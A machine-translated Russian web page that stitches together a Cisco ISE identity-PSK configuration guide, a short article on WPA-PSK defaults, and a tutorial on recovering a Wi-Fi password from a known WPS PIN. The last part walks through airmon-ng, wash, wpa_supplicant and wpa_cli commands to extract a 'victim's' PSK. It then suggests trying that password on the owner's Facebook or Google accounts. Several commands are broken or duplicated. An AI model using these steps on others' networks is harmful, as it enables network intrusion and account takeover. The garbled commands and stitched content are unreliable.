  1. Создайте результат профиля авторизации, который вернет атрибуты дифференцированного доступа, которые вы хотите использовать. В этом примере мы просто назначаем VLAN соединению.
    • Политика> Элементы политики> Результаты> Профили авторизации
      • Имя: VLAN 172
      • Общие задачи
      • Расширенные атрибуты
        • Cisco-av-pair = psk-mode = ascii
        • Cisco-av-pair = psk = wifireference
      • Скриншот приведенных выше конфигураций:
      • Убедитесь, что таблица сведений в нижней части профиля авторизации включает информацию, описанную выше
        • «Tunnel-Private-Group-ID» — это атрибут VLAN, и вы также можете видеть в списке обе av-пары.
    • Отправьте свои изменения!
    • Повторите этот процесс столько раз, сколько вам нужно, в зависимости от различных уровней доступа, которые вы хотите предоставить разным группам клиентов.
  2. Теперь нам нужно создать группу идентификаторов конечных точек, которая содержит MAC-адреса клиентов, которые будут аутентифицироваться в сети.
    • В этом примере я собираюсь включить только MAC-адрес тестового клиента, но в реальном мире эти группы обычно содержат большие списки MAC-адресов. Важно отметить, что эта группа MAC-адресов будет указана в правилах RADIUS и рассматриваться как одна группа клиентов. Все эти группы клиентов должны иметь один и тот же PSK и все должны иметь одинаковый уровень доступа.Вам нужно разделить клиентов на разные группы, если вы хотите разграничить доступ между ними. Вам нужно ровно столько групп идентификаторов конечных точек, сколько необходимо для удовлетворения ваших требований к дифференцированному доступу.
    • Администрирование> Управление идентификацией> Группы
      • Добавить новую группу
        • Убедитесь, что группы идентификаторов конечных точек выбраны в левой части экрана.
      • Имя: Special_PSK_Devices (Примечание: здесь нельзя использовать пробелы)
      • Отправить
      • Щелкните только что созданную группу, чтобы открыть ее сведения.
      • Добавить соответствующие MAC-адреса в группу

      • Сохраните изменения!
    • Теперь на эту группу MAC-адресов можно ссылаться в политике авторизации
  3. Создайте политику авторизации (или измените существующую политику) для клиентов Special PSK (которые вы определили в группе идентификаторов конечных точек)
    • Политика> Политика авторизации
    • Этот набор правил действует во многом как база правил брандмауэра, поскольку на него ссылаются сверху вниз, и первое совпадение побеждает.В результате (каламбур) вы должны очень внимательно следить за порядком своих правил. Более конкретные правила обычно выше более общих.
      • У вас также могут быть правила управления устройствами в этом списке (для входа в WLC и т. Д.). Будьте осторожны, чтобы сделать каждое правило достаточно конкретным, чтобы на него случайно не ссылался другой тип подключения.
      • Для простоты мы создадим правило в верхней части списка, чтобы мы знали, что оно сработает при нашем соединении.
    • Справа от самого верхнего правила щелкните маленькую стрелку вниз и выберите Вставить новое правило выше
      • Определить правило
        • Название: iPSK Special Devices
        • Условия:
          • ЕСЛИ
            • Группы идентификаторов конечных точек> Special_PSK_Devices (группа идентификаторов конечных точек, созданная вами ранее)
          • и
            • Выберите Существующее условие из библиотеки> Соединение> Беспроводной MAB
        • Разрешения
          • тогда
            • VLAN 172 (профиль, который вы создали ранее)
      • Нажмите Готово
      • Ваше правило должно выглядеть примерно так:
        • Примечание. Карандаш в левом столбце указывает, что это правило еще не было сохранено / применено.Вы должны сохранить свои изменения на этой странице, прежде чем правило можно будет протестировать!
      • При желании вы можете быть более конкретным и включить имя SSID в правило (чтобы другие соединения случайно не попали в это правило)
        • Щелкните «+» в столбце атрибутов, который содержит Wireless MAB, и добавьте новое условие
        • Щелкните значок шестеренки справа и выберите Добавить атрибут / значение
        • Убедитесь, что операнд между правилами — «И».
        • Нажмите Выбрать атрибут, выберите «Радиус» и «Идентификатор вызываемой станции [30]».

        • Измените «Равно» на «Заканчивается», поскольку поле идентификатора вызываемой станции содержит информацию, отличную от SSID.
          • Pro Tip : Если вы собираетесь использовать эту информацию в своем правиле, вы захотите проверить, что ваш WLC настроен для отправки SSID как части атрибута RADIUS идентификатора вызываемой станции.
          • В WLC выберите Security> RADIUS> Authentication и убедитесь, что «Auth Called Station ID Type» имеет SSID в конце строки. Чаще всего для этого будет установлен MAC-адрес AP: SSID, что означает, что атрибут будет включать MAC-адрес точки доступа, к которой подключен клиент, и SSID, к которому подключен клиент, разделенные двоеточием.
          • Теперь ваше правило должно выглядеть примерно так:
          • Обязательно сохраните изменения, когда закончите с правилом
      • Вы можете продублировать это правило и изменить его особенности, если у вас много групп, которые вы хотите аутентифицировать.
  4. Теперь нам нужно создать правило для клиентов, использующих «общий / общий» PSK.Помните, что даже клиенты, использующие PSK, который настроен в WLC, должны получить ACCESS-ACCEPT от RADIUS, чтобы им было разрешено в сети. Это означает, что в RADIUS должно быть правило, разрешающее это соединение.
    • По сути, это более простая версия только что созданного правила. Вам не нужно ссылаться на группу идентификаторов конечных точек, и вам не нужно иметь конкретный результат AuthZ
    • Добавьте новое правило под только что созданным правилом.
      • Название: iPSK General
      • Условия
        • Если
        • и
          • Wireless MAB (см. Предыдущее правило о том, как выбирать эти атрибуты)
          • Идентификатор вызываемой станции заканчивается на «IdentityPSK» (ваше имя SSID iPSK)
      • Разрешения
    • Теперь ваши правила должны выглядеть примерно так:
  5. Теперь вы можете протестировать свою конфигурацию iPSK!
    • Протестируйте клиента, который существует в группе идентификаторов конечных точек, с помощью уникального PSK
      • Протестируйте того же клиента с помощью общего PSK (он должен завершиться ошибкой)
    • Протестируйте клиента, не входящего в группу идентификации конечной точки, с помощью общего PSK
      • Протестируйте того же клиента с уникальным PSK (он должен завершиться ошибкой)
    • Вот как выглядит успешная аутентификация с уникальным PSK в ISE:
      • Обратите внимание на правильный результат авторизации, идентификационную группу и, возможно, самое важное, на соответствие правилу
.

Что такое WPA-PSK по умолчанию для Wi-Fi? | Small Business

Беспроводные маршрутизаторы имеют два набора паролей: один, который позволяет пользователям подключаться к нему, когда он использует метод беспроводного шифрования, такой как WPA-PSK, а другой — для доступа к его административной панели управления. Все маршрутизаторы, беспроводные или другие, поставляются с паролями по умолчанию на панелях управления, но ни у одного маршрутизатора нет заводских настроек, которые включают метод беспроводного шифрования или пароль.

Шифрование на основе ключей

Метод шифрования, использующий ключ, не всегда обеспечивает шифрование данных с использованием одной и той же схемы кодирования.Скорее схема, которую использует такой алгоритм для шифрования информации, основана на ключе. Когда вы предоставляете в качестве ключа другую строку букв и цифр, один и тот же метод шифрования будет шифровать одни и те же данные разными способами. Это означает, что простого знания схемы шифрования недостаточно для декодирования зашифрованных данных: знание схемы кодирования бесполезно, если вы также не знаете ключ, который алгоритм использовал для шифрования чего-либо.

WPA-PSK

WPA-PSK использует этот тип системы шифрования ключей для защиты сетей Wi-Fi.Когда вы устанавливаете пароль WPA-PSK на маршрутизаторе, вы фактически устанавливаете ключ, который стандарт WPA будет использовать для шифрования данных. Когда пользователи вводят этот совпадающий ключ в качестве «пароля», их компьютеры смогут связываться с маршрутизатором. В противном случае они не смогут подключиться к сети, потому что их компьютеры не смогут понять ничего, что им отправляет маршрутизатор. В методах шифрования на основе ключей не существует такого понятия, как «ключ по умолчанию». Если ваш маршрутизатор осуществляет вещание с помощью WPA-PSK, это означает, что кто-то с административным доступом к маршрутизатору включил шифрование с помощью ключа по своему выбору.

Панель администратора маршрутизатора

Ключ WPA-PSK — это данные, необходимые для подключения к сети в качестве обычного пользователя. Если вы пытаетесь получить доступ к панели управления маршрутизатора через его Wi-Fi-соединение, то имя пользователя и пароль, которые он запрашивает, не будут вашим ключом WPA-PSK. Каждый производитель маршрутизатора устанавливает собственное имя пользователя и пароль по умолчанию для доступа к панели управления маршрутизатора, и вы можете найти эту информацию в документации своего устройства.

Восстановление заводских настроек по умолчанию

Если вы забыли свой ключ WPA-PSK, у вас есть два варианта.Один из них — подключиться к маршрутизатору через кабель Ethernet и получить доступ к его панели управления, чтобы вручную установить другой пароль. Второй вариант немного более драматичен; Если вы изменили учетные данные для входа в панель управления маршрутизатора с заводских значений по умолчанию, но не можете вспомнить, что именно вы изменили, вам придется нажать кнопку «Сброс» на маршрутизаторе. Это очистит все пользовательские конфигурации, которые вы установили на своем устройстве, и восстановит все его настройки до заводских значений по умолчанию. После сброса настроек устройства не забудьте снова включить шифрование WPA-PSK; по умолчанию беспроводные маршрутизаторы используют незашифрованные сигналы, к которым может присоединиться любой желающий.

.

Как получить PSK или пароль сети Wi-Fi, если у вас есть WPS-контакт — Kamil’s Lab

About: Я ранее обсуждал, насколько легко можно взломать маршрутизатор с включенным WPS. Вы можете проверить мой пост о том, как выполнить атаку Pixie Dust Attack и попытаться получить пин-код WPS с незащищенного маршрутизатора. Атака занимает считанные секунды, а не дни и раскрывает ваш пароль WiFi. Не имеет значения, используете ли вы защиту WPA или WPA2, поскольку вывод WPS полностью обходит эту защиту.Поскольку у вас уже есть пин WPS, вы сможете подключиться к SSID пользователя, но вы не будете знать их сетевой пароль. Метод, который я покажу вам сегодня, покажет их пароль SSID. Если у вас есть их пароль SSID, они могут использовать тот же пароль для Facebook, Google или любого другого веб-сайта.

Немного знаний о WPS. WPS означает Wi-Fi Protected Setup и представляет собой стандарт беспроводной сети, который пытается сделать соединение между маршрутизатором и вашими беспроводными устройствами быстрее и проще.Он работает только для беспроводных сетей с безопасностью WPA / WPA2. Предполагается, что для упрощения подключения устройств без клавиатуры, например телевизора, к вашей домашней сети. Большинство маршрутизаторов поставляются с включенным WPS и работают, нажав кнопку WPS на маршрутизаторе и подключив ваше устройство. Я лично никогда не слышал о WPS до проведения этого исследования и никогда не использовал его в своей личной жизни.

Цель: Продемонстрировать, как получить PSK (пароль) сети Wi-Fi, если у вас есть WPS-контакт

Материал: Вам понадобится следующее:

  • Raspberry Pi (у меня PwnPi 3.0 работает на моем)
  • USB-адаптер WiFi — в этом руководстве я использовал адаптер Panda USB WiFi.
  • PwnPi или Kali Linux distro на вашем Raspberry Pi или Linux-машине
  • WPS Pin для сети, которую вы пытаетесь украсть PSK ( Пароль)

Инструкции: Я использую дистрибутив PwnPi на моем Raspberry Pi, в котором есть инструменты, которые мне понадобятся для получения PSK Wi-Fi жертв. Для предоставления доступа к PSK вам в значительной степени потребуются «WPA_Supplicant» и «WPA Cli», установленные в вашем дистрибутиве, поэтому использование PwnPi или Kali не обязательно, если вы хотите установить эти пакеты отдельно.

Как уже говорилось ранее, я предполагаю, что у вас уже есть WPS-контакт сети, из которой вы хотите получить PSK. Нам нужно начать с перевода нашего беспроводного интерфейса в режим монитора с помощью airmon-ng start . Мой беспроводной интерфейс — wlan0. Используйте «iwconfig», чтобы найти свой. Если вы запустите команду ниже, и airmon-ng выдает ошибки, связанные с тем, что определенные процессы запущены и могут мешать, вы можете либо убить их вручную, либо ввести команду «airmon-ng check kill», которая проверит процессы и автоматически завершит их.

Это должно создать интерфейс монитора на «mon0». Теперь мы воспользуемся промывкой, чтобы найти в нашем районе точки доступа, в которых включен WPS. Простой запуск ‘wash -i

Результат промывки, в котором будут отображаться точки доступа с включенным WPS

Запишите BSSID точки доступа, для которой у вас есть PIN-код WPS. Нам это понадобится на следующем шаге. В этом уроке я получу доступ к моей собственной сети. SSID для моей сети — «dayz», и я запишу «9C: D3: 6D: 02: 3A: E» в качестве своего BSSID.

Теперь мы будем использовать «wpa_supplicant» для подключения к нашей точке доступа вручную и получения PSK. Начнем с настройки нашего файла wpa_supplicant.conf

nano /etc/wpa_supplicant.conf

nano /etc/wpa_supplicant.conf

Это должен открыть файл .conf, и мы добавим следующие строки. Примечание. Ваш файл может быть пустым, что не является проблемой.

ctrl_interface = / var / run / wpa_supplicant ctrl_interface_group = 0 update_config = 1

ctrl_interface = / var / run / wpa_supplicant

ctrl_interface_group = 0

update_config = 1

Нажмите CTRL + X, чтобы сохранить файл и выйти.Теперь мы запустим wpa_supplicant следующей командой:

wpa_supplicant -Dwext -iwlan0 -c / etc / wpa_supplicant.conf –B

wpa_supplicant -Dwext -iwlan0 -c / etc / wpa_supplicant.conf –B

Вы можете получить неверный аргумент. это нормально. Оставьте это окно открытым и откройте новый терминал или окно ssh. Теперь мы будем запускать wpa_cli и запускать команды вручную.

Теперь вы должны получить окно командной строки, в котором вы можете вводить команды.Введите «status», и вы должны увидеть ответ «wpa_state = INACTIVE». Как только вы это сделаете, мы добавим наш BSSID, полученный ранее, и пин WPS, который у вас уже есть. Введите следующую команду в wpa_cli ‘wps_reg

wps_reg 9C: D3: 6D: 02: 3A: E0 29066810

wps_reg 9C: D3: 6D: 02: 3A: E0 29066810

Это должно занять несколько секунд и попытаться установить связь с Access Точка. Мы ждем возврата CTRL-EVENT-CONNECTED.Когда мы видим это, мы знаем, что наш PIN-код был принят, и мы связаны с точкой доступа. Когда это будет завершено, нажмите CTRL + C , чтобы выйти из wpa_cli. Теперь мы запустим dhclient, чтобы получить назначенный нам IP-адрес, если он не был назначен автоматически. Выполните следующую команду:

Теперь вернитесь к wpa_cli и введите «save», который должен вернуть «OK». Это сохранит данные в наш файл wpa_supplicant.conf. Теперь мы можем снова выйти из wpa_cli, набрав CTRL + C. Прочтите файл wpa_supplicant.conf с помощью следующей команды и найдите PSK.

cat /etc/wpa_supplicant.conf

cat /etc/wpa_supplicant.conf

Получение PSK из файла WPA_Supplicant.conf

Как видите, мой PSK — это ‘www.kamilslab.com’.

Вот и все, теперь вы знаете PSK или пароль точки доступа, к которой вы подключены. Опять же, если вы знаете, кому принадлежит точка доступа Wi-Fi, вы можете попробовать использовать этот пароль в учетных записях людей, таких как Facebook, Google или любой другой веб-сайт.Многие люди используют один и тот же пароль для нескольких веб-сайтов.

Если у вас есть вопросы, оставьте комментарий ниже.

.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *